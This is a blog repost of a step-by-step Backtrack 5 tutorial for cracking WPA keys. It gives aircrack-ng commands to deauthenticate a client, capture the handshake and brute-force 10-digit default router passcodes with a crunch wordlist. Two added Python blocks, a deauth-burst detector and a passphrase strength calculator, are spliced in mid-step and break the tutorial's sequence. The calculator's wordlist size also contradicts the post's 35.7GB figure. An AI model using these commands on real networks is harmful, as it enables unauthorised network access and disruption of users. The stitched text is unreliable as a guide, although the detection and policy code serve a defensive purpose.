Backtrack 5
Hey, Fajar Maulana Firdaus is back again! In this post I will tell you how to crack a WPA key using Backtrack 5. This article can be found here. Sorry, TRAiN3R: if you want this article taken down, please let me know. It's a nice tutorial from you, so I've decided to post it on my blog. Okay, back to the topic. I am just sharing this tutorial. Follow these steps:

1. Load up Backtrack (in this case, TRAiN3R is using Backtrack 5 R2).

2. Open up "Terminal" and type in:

airmon-ng start {WIRELESSADAPTER}

What that will do is put your device in monitor mode on "mon0" (which will now be your new interface name).

3. In the "Terminal" window, type in:

airodump-ng mon0

In order to get a handshake file (what we will be cracking), you need to have a client connected to the access point you want to attack. airodump will show you whether one is there.

4. Copy down the AP MAC, the client MAC, and of course the channel number. After you've copied them you can close the other windows.

5. In a new terminal window, type in:

airodump-ng -w {CAPFILENAME} --bssid {APMAC} -c {APCHANNEL} mon0

You can now use aireplay-ng to get the capture file; here's how we do it:

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0

After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake; now it's time for the long part, cracking the handshake.

Your time will depend on your computer and your wordlist. In this example, TRAiN3R was attacking a 2WIREXXX network, which in most cases uses a default 10-digit passcode. You can run this command to create a wordlist file for you in Backtrack (for that specific wordlist):
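The handshake only appears in step 5 because the deauthentication frames knock the client off and make it reassociate, and that burst is exactly what a wireless IDS on the network side watches for. Below is an added detection example written for this post; it is not part of TRAiN3R's tutorial and not aircrack-ng code. It assumes a constructed log format of one management frame per line ("<ISO timestamp> <subtype> bssid=<mac> sta=<mac>"), and the threshold of 8 deauth frames per BSSID within one second is an assumed tuning value, not a figure from the page.

```python
"""Flag bursts of 802.11 deauthentication frames per access point.

Added example for this post (not the tutorial's own code). The log format,
the MAC addresses and the threshold/window values are all constructed or
assumed for illustration.
"""
from collections import deque
from datetime import datetime, timedelta


def parse_line(line):
    """Parse one assumed-format log line into (timestamp, subtype, bssid, station)."""
    ts_str, subtype, bssid_kv, sta_kv = line.split()
    bssid = bssid_kv.split("=", 1)[1]
    sta = sta_kv.split("=", 1)[1]
    return datetime.fromisoformat(ts_str), subtype, bssid, sta


def detect_deauth_bursts(lines, threshold=8, window=timedelta(seconds=1)):
    """Return one alert per BSSID whose deauth count reaches `threshold`
    inside a sliding `window`. A lone deauth (a normal idle kick or roam)
    never trips it; a forced-reassociation burst does."""
    recent = {}          # bssid -> deque of recent deauth timestamps
    alerted = set()      # alert once per BSSID
    alerts = []
    for line in lines:
        ts, subtype, bssid, _sta = parse_line(line)
        if subtype != "deauth":
            continue
        q = recent.setdefault(bssid, deque())
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({
                "bssid": bssid,
                "count": len(q),
                "first": q[0].isoformat(),
                "last": ts.isoformat(),
            })
    return alerts


def build_sample_log():
    """Constructed sample: a beacon, a 12-frame deauth burst against AP A
    within about 0.6 s, and a single deauth at AP B five minutes later."""
    base = datetime(2012, 5, 1, 10, 0, 0)
    ap_a, ap_b = "00:11:22:33:44:55", "66:77:88:99:aa:bb"   # constructed MACs
    client = "aa:bb:cc:dd:ee:01"
    lines = [f"{base.isoformat()} beacon bssid={ap_a} sta=ff:ff:ff:ff:ff:ff"]
    for i in range(12):
        ts = base + timedelta(milliseconds=100 + 50 * i)
        lines.append(f"{ts.isoformat()} deauth bssid={ap_a} sta={client}")
    ts = base + timedelta(minutes=5)
    lines.append(f"{ts.isoformat()} deauth bssid={ap_b} sta=aa:bb:cc:dd:ee:02")
    return lines


if __name__ == "__main__":
    for alert in detect_deauth_bursts(build_sample_log()):
        print(f"deauth burst: bssid={alert['bssid']} count={alert['count']} "
              f"between {alert['first']} and {alert['last']}")
```

The sliding window is keyed per BSSID so that an attacker targeting one AP does not get averaged away by quiet APs, and the alert fires once per BSSID to avoid a flood of duplicate events during a long burst. On a real capture source the same logic would be fed from a monitor-mode sniffer or the controller's management-frame logs; 802.11w (protected management frames), where clients support it, is the mitigation that stops unauthenticated deauth frames from working in the first place.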
/pentest/passwords/crunch/./crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txt

IF YOU RUN THAT CRUNCH COMMAND, BE PREPARED: IT'S A 35.7GB FILE!

After that, it's your choice what you want to do. You can either continue cracking it on Backtrack, using pyrit, aircrack-ng, cowpatty, etc., or you can even use Windows with an application like Elcomsoft Wireless Security Auditor. For aircrack-ng run the following command:

aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txt

Notes: As long as you have the capture file, you can crack it on any system. You'll want a system with a lot of processing power, RAM, and a supported graphics card to get upwards of 1500+ keys/second.
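The two numbers above, a 10-digit numeric default passcode and 1500 keys/second, are all you need to see why that kind of default is a problem and what passphrase policy actually buys you. Here is an added calculator for that, written for this post rather than taken from the tutorial or from crunch/aircrack-ng. It takes the 1500 keys/second figure from the notes as its default rate, estimates the candidate count and the time to exhaust it for a given passphrase, and gives a first-order size for a crunch-style one-candidate-per-line wordlist (uncompressed, newline-terminated). The "weak if exhaustible within a year at that rate" rule is an assumed policy threshold, not something the page states.

```python
"""Estimate how long a WPA/WPA2 passphrase survives offline brute force.

Added example for this post (not the tutorial's own code). The 1500 keys/s
default is the rate quoted in the post's notes; the one-year threshold is an
assumed policy choice.
"""
import string

RATE_KEYS_PER_SECOND = 1500       # figure quoted in the post's notes
WEAK_IF_EXHAUSTED_WITHIN_DAYS = 365   # assumed policy threshold
SECONDS_PER_DAY = 86400


def charset_size(passphrase):
    """Size of the smallest standard character class mix covering the passphrase.
    An all-digit passcode like the 2WIRE default scores 10."""
    size = 0
    if any(c in string.digits for c in passphrase):
        size += 10
    if any(c in string.ascii_lowercase for c in passphrase):
        size += 26
    if any(c in string.ascii_uppercase for c in passphrase):
        size += 26
    if any(c in string.punctuation or c == " " for c in passphrase):
        size += 33   # printable ASCII punctuation plus space
    return size


def keyspace(charset, length):
    """Number of candidates a full enumeration has to try."""
    return charset ** length


def wordlist_bytes(charset, length):
    """First-order size of a crunch-style wordlist: every candidate on its own
    line, each line `length` characters plus a newline, no compression."""
    return keyspace(charset, length) * (length + 1)


def seconds_to_exhaust(charset, length, rate=RATE_KEYS_PER_SECOND):
    """Worst-case time to try every candidate at `rate` keys/second."""
    return keyspace(charset, length) / rate


def assess(passphrase, rate=RATE_KEYS_PER_SECOND):
    """Summarise the passphrase's resistance to offline brute force."""
    charset = charset_size(passphrase)
    days = seconds_to_exhaust(charset, len(passphrase), rate) / SECONDS_PER_DAY
    return {
        "length": len(passphrase),
        "charset": charset,
        "keyspace": keyspace(charset, len(passphrase)),
        "days_to_exhaust": days,
        "weak": days < WEAK_IF_EXHAUSTED_WITHIN_DAYS,
    }


if __name__ == "__main__":
    # Constructed sample passphrases: a 10-digit default-style passcode versus
    # a longer lowercase-with-spaces phrase.
    for candidate in ("1234567890", "correct horse battery"):
        r = assess(candidate)
        print(f"{candidate!r}: charset={r['charset']} keyspace={r['keyspace']:.3e} "
              f"days={r['days_to_exhaust']:.1f} weak={r['weak']}")
    gb = wordlist_bytes(10, 10) / 1e9
    print(f"crunch 10 10 0123456789 (one candidate per line): about {gb:.0f} GB uncompressed")
```

At 1500 keys/second a 10-digit numeric passcode is fully enumerated in about 77 days, and a GPU rig or a cloud cracker is far faster than that, which is why a router's factory numeric default is not a credential. Length across more than one character class moves the estimate out of reach by many orders of magnitude; the practical defence is a long passphrase that is not the vendor default, and the model above also shows why a minute-long "is this passphrase in a feasible wordlist" check belongs in any wireless audit.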
Take a few minutes to give me any comments, criticism, and suggestions. Your comments will make this blog more attractive [as soon as I read them]. Thanks for your comments!